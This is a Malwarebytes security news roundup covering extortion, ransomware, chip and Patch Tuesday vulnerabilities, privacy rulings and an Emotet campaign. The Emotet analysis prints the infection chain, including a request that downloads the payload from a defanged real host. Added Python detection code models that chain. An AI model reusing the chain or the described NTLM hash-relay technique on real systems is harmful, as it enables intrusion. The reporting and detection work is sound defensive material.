A week in security (March 13 – 19)

Last week on Malwarebytes Labs:

Stay safe!


Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW

“ViLE” members posed as police officers and extorted victims

Two men have been charged with wire fraud and conspiracy to commit computer intrusions after they allegedly extorted victims by threatening to publish their personal information online—a practice known as doxxing.

In a press release, the US Attorney’s Office in the Eastern District of New York revealed details about the complaint against Sagar Steven Singh and Nicholas Ceraolo. Singh has been arrested but Ceraolo is still at large.

Singh and Ceraolo belonged to a group called ViLE. Members of ViLE sought to collect victims’ personal information, such as names, physical addresses, telephone numbers, social security numbers, and email addresses. ViLE runs its own website, where it posts that information unless the victim complies with its demands.

In order to get hold of the personal information, it’s alleged that Singh and Ceraolo unlawfully used a police officer’s stolen password to access a restricted database.

They used the police officer’s credentials to access the web portal maintained by a US federal law enforcement agency, whose purpose is to share intelligence from government databases with state and local law enforcement agencies. The database contained (among other data) detailed, nonpublic records of narcotics and currency seizures, as well as law enforcement intelligence reports. 

As stated by United States Attorney Peace:

“As alleged, the defendants shamed, intimidated and extorted others online. This Office will not tolerate those who impersonate law enforcement officers and misuse the public safety infrastructure that exists to protect our citizens.”

The two suspects are also charged with accessing the email account of a foreign law enforcement officer. They abused this access to defraud social media companies by making purported emergency requests for information about the companies’ users. For example, one of the defendants used an official email account to pose as a Bangladeshi police officer in communication with US-based social media platforms.

The same Bangladeshi police account was used to request data about the user of an online gaming platform. When caught, the defendants allegedly threatened to sell the platform’s information on the Dark Web. An associate posed as a US local police officer and sent a forged subpoena to one of the platform’s vendors, seeking registration details about their administrators. The vendor did not provide the information.

Data breach

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

  • Check the vendor’s advice. Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
  • Change your password. You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
  • Enable two-factor authentication. Where possible, use a FIDO2 2FA device. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
  • Watch out for fake vendors. The thieves may contact you posing as a vendor. Check the vendor website to see if they are contacting victims, and verify any contacts using a different communication channel.
  • Take your time. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.

Google reveals 18 chip vulnerabilities threatening mobile, wearables, vehicles

Google’s Project Zero is warning of multiple significant vulnerabilities found across many models of mobile devices, including Samsung Galaxy, Google Pixel and Vivo handsets, as well as several wearables and vehicles that use certain types of components.

Between late 2022 and early 2023, Project Zero reported 18 vulnerabilities in a chip powering those devices. Of those 18, four are tagged as “top-severity”, meaning they could allow silent compromise over the network.

Which devices are affected?

The list of impacted technology is as follows:

  • Mobile devices from Samsung, including those in the S22, M33, M13, M12, A71, A53, A33, A21s, A13, A12 and A04 series
  • Mobile devices from Vivo, including those in the S16, S15, S6, X70, X60 and X30 series
  • The Pixel 6 and Pixel 7 series of devices from Google
  • Any vehicles that use the Exynos Auto T5123 chipset

The four most severe vulnerabilities could allow attackers to remotely compromise a device, with no physical interaction required at any stage of the proceedings. The only thing an attacker requires for the compromise to take place is knowledge of the intended victim’s phone number.

The other fourteen, while still bad, are nowhere near as severe: exploiting them requires either a malicious mobile network operator or an attacker with local access to the device.

Meanwhile, the Google Security research team believes that the most severe vulnerabilities would allow skilled attackers to create an operational exploit in a short space of time.

Patching and scope of threat

While Google mentions that patching will be dependent on the manufacturer, Pixel phones (for example) have already been patched against CVE-2023-24033 in the March security update. If a patch isn’t forthcoming for your own device yet, Google has some suggestions to help keep your technology safe from harm. If your device allows you to, switch off two settings called:

  • Wi-Fi calling
  • Voice-over-LTE (VoLTE)

This will prevent the risk of exploitation. One potential ramification of disabling VoLTE is that in recent years it has become something of a necessity for some mobile networks. If you’re able to turn it off, then based on the information available you may experience poor call quality and lack of certain features and functionality. On the other hand, VoLTE is “not available everywhere on every network, or on every handset” so it may not matter too much anyway depending on your make and model.

As for scope, depending on where your device is from you may not be running the vulnerable type of chip needed for the exploit to be successful. The Verge notes that phones sold outside of Europe and some African countries use something else altogether. In those instances, you should be fine.

LockBit ransomware attacks Essendant

The LockBit ransomware group is claiming responsibility for taking down a US-based distributor of office products called Essendant. This attack, which is said to have begun on or around March 6, created severe ramifications for the organisation, disrupting freight carrier pickups, online orders, and access to customer support.

As noted by Bleeping Computer, the original notification that something had gone wrong made no mention of ransomware or even any form of compromise. There’s still no mention on the updated notification page. However, this may be about to change in the wake of LockBit’s claims.

As with so many ransomware groups out there, LockBit is a fan of using stolen data to apply additional pressure and make victims pay the ransom. In cases where the payment is not made, the data is put up for sale, or simply posted online for free. This is a big leveraging factor on many businesses when deciding what to do about ransom threats.

On March 14, LockBit added Essendant to its leaks page with the threat of supposedly stolen data being published by March 18, if its demands are not met.

Essendant data on the LockBit data leak site

The description of the embattled organisation comes with the message “Change a recovery company and try again”. This could be a reference to previous failed attempts to decrypt the compromised data.

LockBit has demonstrated time and again that it will release stolen data if the target refuses to pay. Just last month, Royal Mail found itself on the wrong end of a data dump via the LockBit leak portal after a high profile ransomware attack caused all manner of postal delays.

Unusually, the Royal Mail data dump also came with a chat log of the entire conversation between LockBit and Royal Mail. The log is absolutely fascinating and illustrates the need for victims to employ someone who knows what they’re doing when negotiating with attackers.

LockBit is arguably the most dangerous malware in the world right now. It was by far the most dominant ransomware in 2022, and hasn’t slowed down in 2023, which is why it’s one of the five threats you can’t afford to ignore in our 2023 State of Malware report.

[Chart: Known attacks by the most prevalent ransomware-as-a-service groups in 2022]

Its success comes from its professionalism. LockBit is run as a business: It has a slick website, it avoids the political grandstanding of its competitors, and even offers bug bounties to people who find flaws in its software. It distributes three different versions of its ransomware-as-a-service (RaaS), which are reportedly used by 100 affiliates, and its largest known ransom demand is $80 million.

How to avoid ransomware

  • Block common forms of entry. Create a plan for patching vulnerabilities in internet-facing systems quickly; disable or harden remote access like RDP and VPNs; use endpoint security software that can detect exploits and malware used to deliver ransomware.
  • Detect intrusions. Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
  • Stop malicious encryption. Deploy Endpoint Detection and Response software like Malwarebytes EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
  • Create offsite, offline backups. Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
  • Don’t get attacked twice. Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

Rubrik is latest victim of the Clop ransomware zero-day campaign

Rubrik, a cybersecurity company specializing in cloud data management, has revealed that some of its systems were infiltrated by the Clop ransomware group. Rubrik is one of many companies attacked by Clop via an infamous zero-day vulnerability in the GoAnywhere file transfer software.

The attack began in February, according to its CEO Michael Mestrovich. “We detected unauthorized access to a limited amount of information in one of our non-production IT testing environments as a result of the GoAnywhere vulnerability,” he says in a blog post published Tuesday. Mestrovich claims that “based on our current investigation, being conducted with the assistance of third-party forensics experts, the unauthorized access did NOT include any data we secure on behalf of our customers via any Rubrik products.”

He also revealed the attackers compromised internal sales data, including customer and partner company names, business contact information, and some purchase orders from Rubrik distributors. According to Mestrovich, the third-party investigators used by Rubrik confirmed that no personal information, such as Social Security Numbers (SSNs), financial accounts, and payment card numbers, were compromised.

The GoAnywhere vulnerability, tracked as CVE-2023-0669, has a severity rating of High and was included in CISA’s Known Exploited Vulnerabilities Catalog, a list of actively exploited vulnerabilities every federal information system must patch urgently. The catalog is an essential go-to list for IT admins trying to prioritize their patching.

The attack on Rubrik happened before an emergency patch was available.

Clop hasn’t been shy about the 130 organizations it’s stolen data from thanks to the GoAnywhere vulnerability. Last week, the gang began sending out extortion emails to the victims, and adding them to its leak site. Known victims include Rubrik, Hatch Bank and Community Health Systems (CHS).

Organizations using GoAnywhere should download the security patch immediately. Fortra has also provided a technical mitigation in its advisory, which can be accessed via the company’s customer portal.

Ransomware attack hits ANOTHER school

In what is likely Vice Society’s handiwork, the UK’s largest state boarding school Wymondham College has announced it has become the victim of a “sophisticated cyberattack”. The school didn’t provide additional information, but Jonathan Taylor, chief of the school’s parent company Sapientia Education Trust, has revealed the school is yet to receive a ransom note.

In an email to The Record, Taylor said:

“We are not aware of any data breach. A number of the College’s systems have been impacted, including access to some files and resources.” 

Taylor said the school remains open, saying the priority is “to ensure continuity of educational provision”. The Norwich Evening News reports disruption will likely continue until the Easter holidays as the attack targeted the College’s IT system.

Wymondham College is working with the National Cyber Security Centre (NCSC), the UK’s authority for cyber incidents, to ensure an appropriate response. Taylor says the Department of Education has also been notified.

The NCSC has warned the UK education sector about increasing targeted ransomware attacks toward schools, colleges, and universities. However, latest research from the London Grid for Learning (LGfL) reveals that only 53 percent of UK schools feel prepared for a cyberattack. 

Hackers threaten to leak STALKER 2 assets if devs don’t heed demands

Ukrainian game developer GSC Game World has announced it was breached by Russian hacktivists who stole assets related to the much-awaited game STALKER 2: Heart of Chernobyl. 

According to GSC, the hacktivists accessed an employee’s image app account and stole STALKER 2’s full story, cut scenes, various concept art, global maps, and more. The company said these assets are being used for blackmail and intimidation.

“We have been enduring constant cyberattacks for more than a year now,” the GSC Game World team said in its.

“We have faced blackmail, acts of aggression, attempts to hurt players and fans, and efforts to damage the development process of the reputation of our company.”

A group named Vestnik TSS has claimed responsibility and has given the devs an ultimatum: Do as we say, or we’ll leak all stolen STALKER 2 assets.

“Nick Frost”, a Vestnik TSS administrator, posted the group’s demands on the Russian social media site VK.com. Below is a screenshot of the English-translated post:

[Screenshot: the English-translated Vestnik TSS post]

Vestnik TSS wants GSC to apologize to players in Russia and Belarus for its perceived “unworthy attitude” towards them, un-ban certain Russian accounts on its official Discord server, and bring back the Russian localization of STALKER 2. The group gave the developers until March 15, Wednesday, to make these changes.

It appears, however, that Vestnik TSS leaked some files that they stole before yesterday’s deadline. The group’s VK page is awash with concept art, which includes an overview of mutant NPCs, bits of the game world’s map, and artifacts. On Tuesday, alias “Daniel Nexus”, likely another admin, posted more STALKER 2 assets archived and kept behind a password.

GSC Game World is yet to respond to the demands, and by the tone of its message, I suspect the developers have no intention of complying. Instead, the team has pleaded with the STALKER community to refrain from watching or distributing the leaked materials.

“Outdated and work-in-progress materials may dilute the impression of the final idea that we have put into the game. We encourage you to stay patient and wait for the official release for the best experience possible. We believe that you will love it.”

Facebook illegally processed user data, says court

The Amsterdam court has ruled that Facebook illegally processed user data in a case started by the Dutch Data Privacy Stichting (DPS), a foundation that acts on behalf of victims of privacy violations in the Netherlands.

According to the ruling, Facebook used personal data for advertising purposes in the period April 1, 2010, to January 1, 2020, when this was not allowed. The same ruling also says that Facebook shared personal data with third parties without any legal basis to do so, and without informing the users themselves. Without properly informing users there can be no consent.

The DPS and the Dutch Consumentenbond—a consumers association with over 400,000 members—filed a class-action suit against Facebook Ireland, which is the European subsidiary of Meta that oversees the processing of Dutch user data. This ruling doesn’t mean damages can yet be claimed by the 185,000+ people that are represented in the class-action suit, but it’s one step closer. Based on this ruling, the group now hopes to sit down with Facebook to negotiate a settlement. Any of the roughly 10 million Dutch people who used Facebook during the relevant period can join if the case moves to a damages phase.

The main complaints were that Facebook used personal data for advertising and shared data like sexual preferences and religion with third parties. The data in question were both provided by the users themselves and derived by Facebook from the users’ browsing behavior outside of Facebook itself. Facebook not only shared users’ personal data with third parties but also the personal data of their Facebook friends.

Facebook was cleared of the complaint that it placed cookies on third party websites. The court ruled that it transferred the responsibility for those cookies to the website owners, and had the right to do so. Facebook was also cleared of enrichment charges as the court found not enough proof that Facebook’s monetary gain from these actions resulted in direct damages to the users.

A spokesperson for Meta said the company was “pleased” with parts of the decision but would appeal others, noting that some of the claims date back more than a decade.

Austria

In Austria, the Datenschutzbehörde (DSB) partially upheld a complaint by the privacy organization noyb that Meta’s tracking pixels conflict with European GDPR rules. The website owner was found in conflict with GDPR regulations because personal data of users (at least unique user identification numbers, IP address and browser parameters) were transferred to the USA without ensuring an adequate level of protection.

Last year the Austrian privacy watchdog ruled against Google Analytics as being in conflict with GDPR regulations. According to noyb, the same rules apply to Facebook Login and Meta Pixel because these tools also send data to the US.

Together these rulings may have serious consequences for all European-based website owners. Because of the responsibility website owners take on by using these tools, they can be held liable for the fact that Meta and Google send data to the US without ensuring an adequate level of protection.

Emotet adopts Microsoft OneNote attachments

Last week, Emotet returned after a three-month absence when the Epoch 4 botnet started sending out malicious emails carrying Office documents with malicious macros. While the extracted attachments were inflated to several hundred megabytes, it was surprising to see that Emotet persisted in using the same attack format.

Indeed, Microsoft has been rolling out its initiative of auto-blocking macros from downloaded documents since last summer. This has forced criminals to revisit how they want to deliver malware via malspam. One noticeable change was the use of Microsoft OneNote documents by several other criminal gangs. Now, it is Emotet’s turn to follow along.

[Image: the malicious OneNote attachment with its fake “protected document” notification]

The OneNote file is simple yet effective at social engineering users with a fake notification stating that the document is protected. When instructed to double-click on the View button, victims will inadvertently double-click on an embedded script file instead.

This triggers the Windows scripting engine (wscript.exe) to execute the following command:

"%Temp%\OneNote\16.0\NT\click.wsf"

The heavily obfuscated script retrieves the Emotet binary payload from a remote site:

GET https://penshorn[.]org/admin/Ses8712iGR8du/ HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: penshorn.org

The file is saved as a DLL and executed via regsvr32.exe:

"%Temp%\OneNote\16.0\NT\rad44657.tmp.dll"

Once installed on the system, Emotet will then communicate with its command and control servers to receive further instructions.
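The chain described above (OneNote opens an embedded .wsf under %Temp%\OneNote\16.0\NT\, wscript.exe runs it, and regsvr32.exe then loads a .tmp.dll from the same directory) is exactly the kind of process lineage an EDR can key on. The following added example, which is not Malwarebytes detection logic and uses constructed process-creation events rather than real telemetry, flags each stage of that chain and records whether the regsvr32.exe load descends from the wscript.exe stage; the file paths come from the write-up, the PIDs, user name and benign logon script are invented:

```python
"""Flag the OneNote -> wscript.exe -> regsvr32.exe chain in process-creation telemetry.

Added example with constructed events; not Malwarebytes telemetry or detection code.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Scripts and DLLs the chain drops under %Temp%\OneNote\16.0\NT\ (paths from the write-up).
ONENOTE_TEMP_RE = re.compile(r'\\OneNote\\16\.0\\NT\\[^\\"]+?\.(?:wsf|dll)', re.IGNORECASE)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable basename, as an EDR would record it
    cmdline: str


def onenote_temp_target(cmdline: str) -> Optional[str]:
    """Return the OneNote temp file referenced by a command line, if any."""
    m = ONENOTE_TEMP_RE.search(cmdline)
    return m.group(0) if m else None


def lineage(events: List[ProcEvent], pid: int) -> List[str]:
    """Images from the oldest known ancestor down to pid, e.g. [explorer, ONENOTE, wscript]."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:     # stop at unknown parents or PID reuse loops
        seen.add(pid)
        chain.append(by_pid[pid].image)
        pid = by_pid[pid].ppid
    return list(reversed(chain))


def detect_chain(events: List[ProcEvent]) -> List[Tuple[int, str, str]]:
    """Return (pid, rule name, target path) findings for the two stages of the chain."""
    findings = []
    for e in events:
        target = onenote_temp_target(e.cmdline)
        if target is None:
            continue
        ancestors = [img.lower() for img in lineage(events, e.pid)[:-1]]
        image = e.image.lower()
        if image == "wscript.exe" and target.lower().endswith(".wsf"):
            rule = "wscript-onenote-script"
            if "onenote.exe" in ancestors:           # script launched from the OneNote file
                rule += "-from-onenote"
            findings.append((e.pid, rule, target))
        elif image == "regsvr32.exe" and target.lower().endswith(".dll"):
            rule = "regsvr32-onenote-dll"
            if "wscript.exe" in ancestors:           # DLL load descends from the .wsf stage
                rule += "-chained"
            findings.append((e.pid, rule, target))
    return findings


# Constructed sample telemetry: one infected session plus a benign logon script.
T = "C:\\Users\\alice\\AppData\\Local\\Temp"
SAMPLE_EVENTS = [
    ProcEvent(400, 100, "explorer.exe", "C:\\Windows\\explorer.exe"),
    ProcEvent(510, 400, "ONENOTE.EXE",
              '"C:\\Program Files\\Microsoft Office\\root\\Office16\\ONENOTE.EXE" '
              "C:\\Users\\alice\\Downloads\\invoice.one"),
    ProcEvent(622, 510, "wscript.exe",
              f'"C:\\Windows\\System32\\wscript.exe" "{T}\\OneNote\\16.0\\NT\\click.wsf"'),
    ProcEvent(701, 622, "regsvr32.exe",
              f'regsvr32.exe /s "{T}\\OneNote\\16.0\\NT\\rad44657.tmp.dll"'),
    ProcEvent(800, 400, "wscript.exe",
              '"C:\\Windows\\System32\\wscript.exe" C:\\Scripts\\logon.vbs'),   # benign
]

if __name__ == "__main__":
    for pid, rule, target in detect_chain(SAMPLE_EVENTS):
        print(f"pid {pid}: {rule} -> {target}  lineage={' > '.join(lineage(SAMPLE_EVENTS, pid))}")
```

Matching on the OneNote temp directory rather than on the file names keeps the rule useful when the dropped names change (rad44657.tmp.dll is clearly generated), and the lineage check separates a legitimate wscript.exe run by a logon script from one spawned by a OneNote file.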

As Emotet ramps up its malspam distribution, users should be particularly careful of this threat which we featured in our 2023 State of Malware Report, as it serves as an entry point for other threat actors keen on dropping ransomware.

Malwarebytes customers are protected against this threat at several layers within its attack chain, including web protection and malware blocking. Our EDR product also flags the whole sequence:

[Image: Malwarebytes EDR flagging the OneNote, wscript.exe and regsvr32.exe sequence]

Although Emotet has had vacations, retirements and even been taken down by authorities before, it continues to be a serious threat and highlights how social engineering attacks are so effective. While macros may soon be a thing of the past, we can see that threat actors can leverage a variety of popular business applications to achieve their end goal of gaining a foothold onto enterprise networks.

We will continue to monitor any new developments with Emotet to ensure our customers remain protected.


Have a burning question or want to learn more about our cyberprotection? Get a free business trial below.

GET STARTED

Update now! Microsoft fixes two zero-day bugs

Microsoft, and other vendors, have released their monthly updates. In total Microsoft has fixed 101 vulnerabilities across several products (including Edge), two of them actively exploited zero-days. On top of that, Adobe has fixed an actively exploited vulnerability in ColdFusion.

The Common Vulnerabilities and Exposures (CVE) database lists publicly disclosed computer security flaws. The CVEs of the actively exploited vulnerabilities patched in these updates are:

CVE-2023-23397: a critical Microsoft Outlook Elevation of Privilege (EoP) vulnerability. External attackers could send specially crafted emails that cause the victim’s client to connect to an external UNC location under the attackers’ control. This would leak the Net-NTLMv2 hash of the victim to the attacker, who could then relay it to another service and authenticate as the victim. The connection is triggered automatically when the mail is retrieved and processed by the Outlook client, which could result in exploitation even before the email is viewed in the Preview Pane.

This means this vulnerability could be used to obtain a hashed token, which could then be used in a so-called “pass-the-hash” attack. Windows NT LAN Manager (NTLM) is a challenge-response authentication protocol used to authenticate a client to a resource on an Active Directory domain. When the client requests access to a service associated with the domain, the service sends a challenge to the client, requiring the client to perform a mathematical operation using its authentication token, and then return the result of this operation to the service. The service may validate the result or send it to the Domain Controller (DC) for validation. If the service or DC confirms that the client’s response is correct, the service allows access to the client. Sounds secure, right? Well, the fun part is that with the hash you have enough information to perform the mathematical operation required to gain access. The authentication process does not require the plaintext password. The hash is enough.

CVE-2023-24880: a moderate Windows SmartScreen Security Feature Bypass vulnerability. An attacker could craft a malicious file that would evade Mark of the Web (MOTW) defenses, resulting in a limited loss of integrity and availability of security features such as Protected View in Microsoft Office, which rely on MOTW tagging. Reportedly, this vulnerability was used in ransomware related attacks.

MOTW, the technology that ensures Windows pops a warning message when trying to open a file downloaded from the Internet, makes another comeback. The MOTW is an attribute added to files by Windows when they have been sourced from an untrusted location, like the internet or a Restricted Zone. When you download a file from the internet, Windows adds the zone identifier, or Mark of the Web, to the file as an NTFS stream. When you run the file, Windows SmartScreen checks whether a Zone.Identifier Alternate Data Stream (ADS) is attached to the file. If the ADS indicates ZoneId=3, which means that the file was downloaded from the internet, SmartScreen does a reputation check.
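To make the tagging concrete, here is an added example (not Microsoft’s SmartScreen code) that parses the contents of a Zone.Identifier stream and decides whether the file carries the Mark of the Web. The stream contents and URLs are constructed for the example; the zone numbers are the standard Windows URL security zones. The `read_zone_identifier` helper only works on an NTFS volume under Windows, which is why the rest of the code takes the stream text as input:

```python
"""Interpret the Zone.Identifier alternate data stream that carries the Mark of the Web.

Added example with constructed stream contents; not Microsoft's SmartScreen code.
"""
from typing import Dict, Optional

# Windows URL security zone numbers as written into the ZoneId field.
ZONE_NAMES = {
    0: "Local Machine",
    1: "Local Intranet",
    2: "Trusted Sites",
    3: "Internet",
    4: "Restricted Sites",
}


def parse_zone_identifier(stream: Optional[str]) -> Dict[str, str]:
    """Parse the INI-style [ZoneTransfer] section; {} when the file carries no stream."""
    if stream is None:
        return {}
    fields: Dict[str, str] = {}
    section = None
    for raw in stream.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section == "zonetransfer" and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip()] = value.strip()
    return fields


def zone_id(stream: Optional[str]) -> Optional[int]:
    """ZoneId as an integer, or None if the stream is absent or malformed."""
    value = parse_zone_identifier(stream).get("ZoneId")
    try:
        return int(value) if value is not None else None
    except ValueError:
        return None


def zone_name(stream: Optional[str]) -> str:
    return ZONE_NAMES.get(zone_id(stream), "No mark / unknown zone")


def needs_reputation_check(stream: Optional[str]) -> bool:
    """True for the Internet zone (ZoneId=3), the case the text describes.
    Restricted Sites (4) is treated the same way here; that is this example's assumption."""
    zid = zone_id(stream)
    return zid is not None and zid >= 3


def read_zone_identifier(path: str) -> Optional[str]:
    """Read the stream from a file on NTFS (Windows only); None when it is not present."""
    try:
        with open(path + ":Zone.Identifier", "r", encoding="utf-8", errors="replace") as f:
            return f.read()
    except OSError:      # no ADS, non-NTFS volume, or not Windows
        return None


# Constructed stream contents, as a browser download and an intranet copy would leave them.
SAMPLE_DOWNLOADED = (
    "[ZoneTransfer]\r\nZoneId=3\r\n"
    "ReferrerUrl=https://example.invalid/\r\n"
    "HostUrl=https://example.invalid/report.xlsx\r\n"
)
SAMPLE_INTRANET = "[ZoneTransfer]\r\nZoneId=1\r\n"

if __name__ == "__main__":
    for label, stream in [("download", SAMPLE_DOWNLOADED), ("intranet", SAMPLE_INTRANET), ("untagged", None)]:
        print(f"{label}: zone={zone_name(stream)} reputation_check={needs_reputation_check(stream)}")
```

A file that should have arrived from the internet but shows no stream, or a ZoneId below 3, is worth a second look: that is the state a SmartScreen bypass such as CVE-2023-24880 aims to produce, and it is cheap to audit across a download directory with `read_zone_identifier`.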

CVE-2023-26360: classified as a priority 1 vulnerability in Adobe ColdFusion due to critical deserialization of untrusted data. This flaw can lead to arbitrary code execution, making it a high-priority target for attackers.

Adobe says it is aware that CVE-2023-26360 has been exploited in the wild in very limited attacks targeting Adobe ColdFusion.

Adobe recommends updating your ColdFusion versions 2021 and 2018 JDK/JRE to the latest version of the LTS releases for JDK 11. Applying the ColdFusion update without a corresponding JDK update will NOT secure the server.

Adobe also recommends customers apply the security configuration settings as outlined on the ColdFusion Security page as well as review the respective Lockdown guides.

Other vendors

Other vendors have synchronized their periodic updates with Microsoft. Here are a few major ones that you may find in your environment.

  • SAP has released security updates for 19 vulnerabilities, five of which were rated as critical.